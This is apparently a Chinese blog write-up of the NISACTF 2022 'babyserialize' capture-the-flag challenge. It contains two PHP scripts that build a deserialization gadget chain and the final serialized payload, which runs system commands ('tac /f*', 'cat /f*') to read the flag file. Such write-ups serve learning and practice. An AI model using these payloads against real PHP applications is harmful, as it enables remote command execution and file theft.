首页 > 其他分享 >[NISACTF 2022]babyserialize

[NISACTF 2022]babyserialize

时间:2024-10-29 18:19:12浏览次数:5  
标签:2022 NISA Ilovetxw su ext babyserialize huang new NISACTF

1.题目

2.exp

两种

第一种:

<?php
header("Content-Type:text/html;charset=utf-8");
    class NISA{
        public $fun;
        public $txw4ever='SYSTEM("tac /f*");';
    }
    class TianXiWei{
        public $ext;
        public $x;
    }
    class Ilovetxw{
        public $huang;
        public $su;
    }
    class four {
        public $a;
        public $fun;
    }

    
$p = new TianXiWei();
$p->ext=new Ilovetxw;
$p->ext->huang=new four;
$p->ext->huang->a=new Ilovetxw;
$p->ext->huang->a->su=new NISA;
echo urldecode(serialize($p));
?>

第二种:

class NISA{
    public $txw4ever='SYSTEM("cat /f*");';
}
class Ilovetxw{
}

$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
$a = serialize($a);
echo $a;

3.payload

O:9:"TianXiWei":2:{s:3:"ext";O:8:"Ilovetxw":2:{s:5:"huang";O:4:"four":2:{s:1:"a";O:8:"Ilovetxw":2:{s:5:"huang";N;s:2:"su";O:4:"NISA":2:{s:3:"fun";N;s:8:"txw4ever";s:18:"SYSTEM("tac /f*");";}}s:3:"fun";N;}s:2:"su";N;}s:1:"x";N;}

然后进行get传参 

成功!!!

标签:2022,NISA,Ilovetxw,su,ext,babyserialize,huang,new,NISACTF
From: https://blog.csdn.net/2302_82243198/article/details/143337611

相关文章

  • HNU-操作系统实验lab6-2022级
    实验目的任务调度是操作系统的核心功能之一。UniProton实现的是一个单进程支持多线程的操作系统。在UniProton中,一个任务表示一个线程。UniProton中的任务为抢占式调度机制,而非时间片轮转调度方式。高优先级的任务可打断低优先级任务,低优先级任务必须在高优先级任务挂起或......
  • C++之OpenCV入门到提高001:使用 Visual Studio2022 配置 OpenCV 环境
    一、介绍从今天开始,我们又要开始一个新的系列了,这个系列就是《C++之Opencv入门到提高》。这个系列是有关如何使用C++语言,通过Opencv来实现图像处理、缺陷检测、视频处理、机器学习等功能。OpenCV我也是新接触的,一步一步的学习,一步一步提高。这个系列是以C++为基......
  • 如何减小VS2022 MAUI生成的apk文件大小?
    在解决方案目录树中双击解决方案,打开对应的文档(也就是解决方案名称.csproj文件)的编辑界面在<PropertyGroup>节点内添加以下内容:<!--缩小发布的.apk文件大小--><AndroidLinkTool>r8</AndroidLinkTool><AndroidEnableResourceShrinking>true</AndroidEnableResourceShrinking><An......
  • ROS2在MyCobot320Pi2022和PC之间通讯(都是Ubuntu20.04系统)
    参考:RunningROSacrossmultiplemachineshttp://wiki.ros.org/ROS/Tutorials/MultipleMachinesSLAM+语音机器人DIY系列:(五)树莓派3开发环境搭建——4.PC端与robot端ROS网络通信https://www.cnblogs.com/hiram-zhang/p/10410168.html在多台PC上进行ROS通讯(在多台远程机器人......
  • 20222304 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    实验内容1.1实践内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用msfvenom生成jar、apk等其他文件使用veil加壳工具使用C+shellcode进行编程通过组合应用各种技术实现恶意代码免杀用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电......
  • 20222303 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    一、实验内容1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件;2.能够使用veil,加壳工具;3.能够使用C+shellcode编程;4.能够通过组合应用各种技术实现恶意代码免杀;5.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。二、基础问题回答1.杀软......
  • 20222425 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    202224252024-2025-1《网络与系统攻防技术》实验三实验报告目录1.实验内容2.实验问题3.实验过程3.1正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧3.2通过组合应用各种技术实现恶意代码免杀3.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功,......
  • HNU-操作系统实验Lab5-2022级
    实验目的深刻理解中断的原理和机制,掌握CPU访问中断控制器的方法,掌握Arm体系结构的中断机制和规范,实现时钟中断服务和部分异常处理等。实验过程前言中断是一种硬件机制。借助于中断,CPU可以不必再采用轮询这种低效的方式访问外部设备。将所有的外部设备与CPU直接相连是不......
  • Windows Server 2022 中文版、英文版下载 (updated Oct 2024)
    WindowsServer2022中文版、英文版下载(updatedOct2024)WindowsServer2022x64,Version21H2请访问原文链接:https://sysin.org/blog/windows-server-2022/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWindowsServer2022采用先进的多层安全机制......
  • Windows Server 2022 中文版、英文版下载 (updated Oct 2024)
    WindowsServer2022中文版、英文版下载(updatedOct2024)WindowsServer2022x64,Version21H2请访问原文链接:https://sysin.org/blog/windows-server-2022/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWindowsServer2022采用先进的多层安全机制、Azure......